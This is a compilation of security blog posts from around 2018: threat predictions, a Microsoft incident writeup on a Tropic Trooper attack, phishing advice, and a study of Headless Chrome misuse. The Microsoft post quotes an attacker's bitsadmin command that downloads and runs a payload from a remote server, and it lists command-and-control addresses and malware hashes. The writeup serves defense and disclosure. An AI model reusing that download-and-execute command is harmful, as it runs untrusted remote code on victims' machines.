Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

Is security the real stuff of nightmares?

The Chief Information Security Officer role (CISO), is the most senior cyber security role in any organisation, and the role has developed rapidly in recent years under the wave of increased digital needs. With more customer data gathered and stored than ever before, the risk of implementing a sub-par security strategy effects every level of the organisation. CISOs are the custodians, responsible for protecting the face of their business and trust of its customers as … More

The post Is security the real stuff of nightmares? appeared first on Help Net Security.

Keeping data swamps clean for ongoing GDPR compliance

The increased affordability and accessibility of data storage over recent years can be both a benefit and a challenge for businesses. While the ability to stockpile huge volumes and varieties of data can deliver previously unattainable intelligence and insight, it can also result in ‘data sprawl’, with businesses unclear of exactly what information is being stored, where it’s being held, and how it’s being accessed. The introduction of the General Data Protection Regulation (GDPR) in … More

The post Keeping data swamps clean for ongoing GDPR compliance appeared first on Help Net Security.

7 trends driving enterprise IT transformation in 2019

Enabling the business outcome in a ‘Real-Time’ enterprise environment is the next challenge for global brands and government agencies in 2019. Tech companies will need to drive hard to continually exceed to their customers’ expectations during a time of accelerating change. They will need to show how technology can help deliver on their customers’ objectives, improve agility, security and impact, or they risk being disrupted. Here is Verizon Enterprise Solutions’ view of those enterprise technology … More

The post 7 trends driving enterprise IT transformation in 2019 appeared first on Help Net Security.

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer have foothold on affected machines, returning machines to normal working state. Once the threat is remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed to be for meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines at the top of the queue, helping ensure security operations teams to immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved.
Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.

Conclusion

The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.

 

 

Hadar Feldman and Yarden Albeck
Windows Defender ATP team

 

 

Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138 [.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

The Spotify Phishing Scam: How to Reel in This Cyberthreat

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting innocent Spotify customers’ credentials at risk.

So, how are the account hijackers conducting these phishing attacks? The campaign sends listeners fraudulent emails that appear to be from Spotify, prompting them to confirm their account details. However, the link contained in the email is actually a phishing link. When the user clicks on it, they are redirected to a phony Spotify website where they are prompted to enter their username and password for the hacker’s disposal.

This phishing campaign can lead to a variety of other security risks for victims exposed to the threat. For example, many users include their birthday or other personal information in their password to make it easier to remember. If a hacker gains access to a user’s Spotify password, they are given a glance into the victim’s password creation mindset, which could help them breach other accounts belonging to the user.

Fortunately, there are multiple steps users can take to avoid the Spotify phishing campaign and threats like it. Check out the following tips:

  • Create complex passwords. If a hacker gains access to a victim’s username and password, they will probably analyze these credentials to determine how the victim creates their passwords. It’s best to create passwords that don’t include personal information, such as your birthday or the name of your pet.
  • Avoid reusing passwords. If victims reuse the same password for multiple accounts, this attack could allow cybercriminals to breach additional services and platforms. To prevent hackers from accessing other accounts, create unique usernames and passwords for each online platform you use.
  • Look out for phishing red flags. If you notice that the “from” address in an email is a little sketchy or an unknown source, don’t interact with the message. And if you’re still unsure of whether the email is legitimate or not, hover your mouse over the button prompting you to click on the link (but don’t actually click on it). If the URL preview doesn’t seem to be related to the company, it is most likely a phishing email.
  • Be skeptical of emails claiming to come from legitimate companies. If you receive an email asking to confirm your login credentials, go directly to the company’s website. You should be able to check the status of your account on the company website or under the settings portion of the Spotify app to determine the legitimacy of the request.
  • Use security software to surf the web safely. Make sure you use a website reputation tool like McAfee WebAdvisor to avoid landing on phishing and malicious sites.

And, as always, to stay on top of the latest and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’us on Facebook.

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

Radware Blog: Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms

For years, cybersecurity professionals across the globe have been highly alarmed by threats appearing in the form of malware, including Trojans, viruses, worms, and spear phishing attacks. And this year was no different. 2018 witnessed its fair share of attacks, including some new trends: credential theft emerged as a major concern, and although ransomware remains […]

The post Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms appeared first on Radware Blog.



Radware Blog

Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why

Google Chrome is the most popular web browser and has been so for almost a decade. Each new version of Chrome brings new usability, security and performance features.

This article focuses on the “headless mode” feature that Google released more than a year ago; and, since day one has become very popular not only among software engineers and testers but also with attackers.

Off with their heads!

Headless mode is a functionality that allows the execution of a full version of the latest Chrome browser while controlling it programmatically. It can be used on servers without dedicated graphics or display, meaning that it runs without its “head”, the Graphical User Interface (GUI).

In headless mode, it’s possible to run large scale web application tests, navigate from page to page without human intervention, confirm JavaScript functionality and generate reports.


As with benign cases, the same functionality takes place in malicious scenarios, when an attacker needs to evaluate JavaScript or emulate browser functionality.

The practice of web browser automation isn’t new. It’s used in dedicated headless browsers like PhantomJS and NightmareJS, test frameworks like Capybara and Jasmin, and tools like Selenium that can automate different browsers including Chrome.

How popular is Headless Chrome?

The chart below shows the amount of traffic generated by Headless Chrome and other major headless browsers since its release date in June 2017. In comparison to other headless browsers and automation frameworks, Headless Chrome overtook the previous leader, PhantomJS, within a year of its release.

Automated browser trends over the last year

The data collected from our cloud WAF statistics, reinforced by data from Google Trends, highlight how the popularity of PhantomJS fades, while Headless Chrome’s trajectory keeps climbing.

PhantomJS and Headless Chrome: Google search trends

Automated browsers driving increased traffic

Apart from Headless Chrome’s popularity, and the degradation in the popularity of outdated tools, we observed an increase in total traffic generated by automated browsers compared to non-automated web surfing.

The chart below represents the percentage of automated browsers out of total traffic generated by web browsers:

Traffic ratio between automated and non-automated browsers

So, why is Headless Chrome so popular?

There are several reasons for Headless Chrome’s popularity; one being the support for Chrome’s new “out of the box” features, which constantly introduce new trends in web development. Another reason is the support for major desktop, server, and mobile operating systems. Headless Chrome also has convenient development tools and many additional useful features for Devs.

 

The release of Puppeteer a couple of months after the release of the headless functionality was a decisive push in Headless Chrome’s popularity. Puppeteer is a NodeJs library developed by the Chrome team, which provides a high-level API to control headless and full versions of the latest Chrome.

Enter Puppeteer

Puppeteer is a common and natural way to control Chrome. It provides full access to browser features and, most importantly, can run Chrome in fully headless mode on a remote server, which is very useful for both automation teams and attackers.

 

Without much difficulty, attackers can put in place an infrastructure with a host of nodes running Headless Chrome and orchestrated by one component (Puppeteer).

 

Apart from Puppeteer, Chrome can be automated using webdriver and automation frameworks like Selenium or by direct access through Command Line Interface (CLI). In this case, some Chrome functionality will be limited, but it offers the flexibility to write automation in any programing language besides NodeJS and JavaScript.

Just how popular is it among attackers?

By analyzing malicious activity generated by automated browsers, I found that PhantomJS was a leader not only in the amount of traffic it produced but also in malicious activity.


However, nowadays, Chrome occupies the top of the “attackers’ podium,” with half of the malicious traffic divided evenly between execution in headless and non-headless mode.

Taking a closer look at malicious traffic, however, I found that there are no specific trends indicating a preference among attackers for Headless Chrome to exploit vulnerabilities, inject SQL or carry out cross-site scripting attacks (XSS). That said, occasional spikes show attempts at targeting specific sites by using vulnerability scanners, or attempts to exploit newly released vulnerabilities using the “spray and pray” technique.

 

Using a web browser for vulnerability scanning is crafty, but not a new approach, as it can help to bypass some validation mechanisms based on validation of the legitimacy of the client.

WAF events generated by Headless Chrome

Analyzing traffic from the last year, I didn’t find any DDoS attacks performed from a botnet based on Headless Chrome. Nothing similar to the Headless Android Botnet that was discovered two years ago and since then all but vanished.

 

Usage of automated browsers in general, and Headless Chrome in particular, for DDoS, is not common practice. The reason for this is the low request rate to the server that browsers can generate. As Chrome receives the response from the server, evaluates it and only then performs the next request, its rate is very low in comparison to a simple script that floods with many requests and doesn’t “care” about the responses.

 

Having said that, we observe more than 10K unique IP addresses daily performing scraping, sniping, carding, blackhat SEO and other types of malicious activity where JavaScript evaluation is necessary to perform the attack. Distribution among the countries performing these malicious activities is presented in the chart below. While 7% of the traffic is coming from proxies or VPNs to hide the origin of the attack.

Geographical distribution of malicious Headless Chrome traffic

But what about legitimate services?

Headless Chrome isn’t only used by attackers but also by legitimate services. We observe dozens of legitimate well-known web tools that use it to access websites.

 

  • Search engines use it to render the page, generate dynamic content and index data from single page web applications.
  • SEO tools use it to analyze your website and help promote it better.
  • Monitoring tools use Headless Chrome to measure performance and JavaScript execution time of web applications.
  • Online testing tools render pages and compare it to previous versions to track regression or distortion in the user interface.

Ok, so how do we make sure we’re protected?

At this point, you’re probably asking yourself whether or not to block Headless Chrome or any other automated browsers.

 

The answer to this question is “yes… and no.”

 

Using Headless Chrome by itself is not malicious, and as stated earlier, there are legitimate scenarios and services that use this functionality to access websites. Whitelisting all legitimate services is tough work, as it requires constant mapping and maintaining the lists of such services and their IPs.

 

The decision to block Headless Chrome requests or not should be based on the intent and behavior of each IP and session individually.

 

Unless the payload is malicious (which is high evidence of malicious activity), it is better to pass some requests to the website, analyze the behavior and only then decide whether to block or not.

 

The reputation of IPs and their correlation, sophisticated heuristics, and machine learning algorithms can be implemented to make a deliberate decision, which will give better long-term results than aggressive blocking, at least in most cases.

 

For Imperva Incapsula users, a set of IncapRules can be implemented to block Headless Chrome from accessing your website. Starting from a simple rule based on client classification up to sophisticated rules including rates, tags, and reputation.

The post Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why appeared first on Blog.

Cyber-criminals invent a new “no talk” scam to trick you

Telephone scams are nothing new. Almost all of us will have taken a call from someone claiming to be from our bank. Or a helpful representative of Microsoft who needs to help us fix our computers.

And because these scams are so common, we’ve got pretty good at spotting them. Which means we are also much less likely to fall victim to them.

Unfortunately, scammers have found other profitable phone scams – and they don’t even need to talk to you.

“Guess the password” scams

Almost every big business – including banks – now rely on call centres to provide help and support to customers. In general these services work quite well, but they can be compromised by determined criminals.

Often these call centres verify customer identity with relatively basic questions. What town were you born in? What is your mother’s maiden name? In the age of Facebook and over-sharing on social networks, this information is surprisingly easy to come by.

The scammer simply calls your bank, answers the relevant security questions and they can take full control of your account. As far as the bank knows, the caller is you.

Other phone services are protected by a 4-digit PIN number. The operator asks for the number – or some specific digits – before permitting access to the account.

The problem with PIN numbers is that there are just 10,000 possible combinations. Given enough time, criminals can simply keep calling in and guessing new combinations until they get the right one.

Both of these attacks work well – and neither requires you to speak with to the hacker.

Smartphone scams

Hackers are also turning to text-only attacks as a way to trick unsuspecting victims into handing over sensitive personal information like passwords. Scammers will often send a text message pretending to be from your bank.

These messages may ask you to text back to confirm your identity. They will ask for a password or PIN for instance – details they can then use to log into your account.

Other messages may contain a link. Tap the link and you land on a website that looks just like your bank’s. When you try to log in, nothing happens – as far as you can tell. But in reality, the scammers have managed to steal your user name, password and other important information that can be used on the real bank site.

By the time you realise, scammers may have already emptied your account. And again, they’ve done it using your phone – but without ever speaking to you.

Protect yourself against no-talk scams

Protecting yourself against no-talk scams is a three-step process. First you must choose security passphrases that are not easily guessed. Select security questions like “What was the name of your first teacher at school?” for instance.

Second, realise that your bank will never send you an SMS asking for your password or other details. And they will never send a link in their messages either – they will simply ask you to visit the website. It is then down to you to open the browser or app manually.

Third, make sure that you have anti-malware like Panda Security installed on your smartphone (free trial here). This will help prevent your phone from being hijacked by malware. And a premium VPN will protect you from fake websites and dodgy links.

No-talk scams are a significant risk to everyone – including you. But they can be avoided using these tips.

For more help and advice about staying safe online, check out the Panda Security blog.

Download your Antivirus

The post Cyber-criminals invent a new “no talk” scam to trick you appeared first on Panda Security Mediacenter.

Why compliance is never enough

Organizations are well aware of the security risks inherent in our hyper-connected world. However, many are making the mistake of focusing their attention on being compliant rather than on ensuring that their security strategy is effective and efficient. As the threat landscape continues to evolve this type of compliance-driven, checkbox mentality is setting many organizations up for a potentially disastrous fall (or breach). Being in compliance does not guarantee that a company has a comprehensive … More

The post Why compliance is never enough appeared first on Help Net Security.

Take cybersecurity into your own hands: Don’t rely on tech giants

Google doesn’t want you to have to think about cybersecurity at all, similar to how we think about breathing, which sounds like a great idea. However, in all of my years in cyber security, from the Israeli Defence Forces’ Intelligence Corps Unit to my years at the government’s National Cyber Bureau – where I worked with one of the most attacked organizations in the world, the Israel Electric Corporation – I’ve learned that trusting solely … More

The post Take cybersecurity into your own hands: Don’t rely on tech giants appeared first on Help Net Security.

Cybersecurity 2019: Predictions you can’t ignore

As we move forward to 2019, expect credit card and payment information theft to continue to rise. Yes, this isn’t a major surprise; however, if organizations can better address the reasons for the rise in cybercrime, they will be better prepared. Bolder cyberattacks against digital businesses The good news: advanced security technologies are constantly being brought to market. The not-so-good news: threat actors are not letting that get in the way; witness more intensified and … More

The post Cybersecurity 2019: Predictions you can’t ignore appeared first on Help Net Security.

Key reasons holding back MFA adoption by mainframe customers

While 64 per cent of mainframers are aware that multi-factor authentication (MFA) is now available to control access to mainframe applications, only 20 per cent acknowledge their organization is already using it or plans to do so, according to Macro 4. Concerns about disrupting applications, lack of mainframe and security skills and resistance from end users are some of the issues holding back adoption. “With data protection and security a major priority among most enterprises, … More

The post Key reasons holding back MFA adoption by mainframe customers appeared first on Help Net Security.

Uber fined $1.1 million by UK and Dutch regulators over 2016 data breach

British and Dutch data protection regulators Tuesday hit the ride-sharing company Uber with a total fine of $1,170,892 (~ 1.1 million) for failing to protect its customers’ personal information during a 2016 cyber attack involving millions of users. Late last year, Uber unveiled that the company had suffered a massive data breach in October 2016, exposing names, email addresses and phone

8 Popular Android Apps Caught Up In Million-Dollar Ad Fraud Scheme

Cheetah Mobile—a prominent Chinese app company, known for its popular utility apps like Clean Master and Battery Doctor—and one of its subsidiary Kika Tech have allegedly been caught up in an Android ad fraud scheme that stole millions of dollars from advertisers. According to app analytics firm Kochava, 7 Android apps developed by Cheetah Mobile and 1 from Kika Tech with a total 2 billion

Mirai Bot Targets Linux Servers Through Hadoop Vulnerability

Mirai Bot, best-known for exploiting IoT Devices has recently been attacking Linux Servers through the Hadoop YARN Vulnerability. Reportedly, many

Mirai Bot Targets Linux Servers Through Hadoop Vulnerability on Latest Hacking News.

Why you shouldn’t be worried about UPnP port masking

Last May, security firm Imperva wrote a blog post discussing a new proof of concept for bypassing DDoS mitigation after discovering reflected network protocols appearing on non-standard network ports. Imperva was able to replicate the same behavior using a technique called UPnP Port Masking, which uses the Universal Plug and Play (UPnP) Protocol to alter the source port of commonly abused network protocols in DDoS attacks. Multiple news outlets picked up on Imperva’s research and … More

The post Why you shouldn’t be worried about UPnP port masking appeared first on Help Net Security.

ATM attackers strike again: Are you at risk?

The United States National ATM Council recently released information about a series of ATM attacks using rogue network devices. The criminals opened the upper half of the ATM and installed the device, most likely into the Ethernet switch. The device then intercepted the ATM’s network traffic and changed the bank’s “withdraw denied” response to “withdraw approved,” presumably only for the criminals’ cards. For many readers, the attacks’ success may be surprising. However, IBM X-Force Red … More

The post ATM attackers strike again: Are you at risk? appeared first on Help Net Security.

The current state of cybersecurity in the connected hospital

Abbott and The Chertoff Group released a white paper that shares key findings from a recent study of 300 physicians and 100 hospital administrators on cybersecurity challenges in the hospital environment. Results found that while physicians and hospital administrators view cybersecurity as a priority, the majority of them feel underprepared to combat cyber risks in the connected hospital. “Cybersecurity is a shared responsibility across all of us working in today’s healthcare system,” said Chris Tyberg, … More

The post The current state of cybersecurity in the connected hospital appeared first on Help Net Security.

How to help maintain security compliance

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know whats happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing youll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, youll need to decide on your policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendationssuch as retention and deletion policiesthroughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53
  • NIST CSF
  • CSA CCM

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • HIPAA/HITECH
  • FFIEC
  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, the Compliance Manager provides you with step-by-step guidance of how to implement controls to enhance your compliance posture and keep you updated with the current compliance landscape. In addition, built-in collaboration tools to help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the datafor example, a label of General means the file doesnt contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

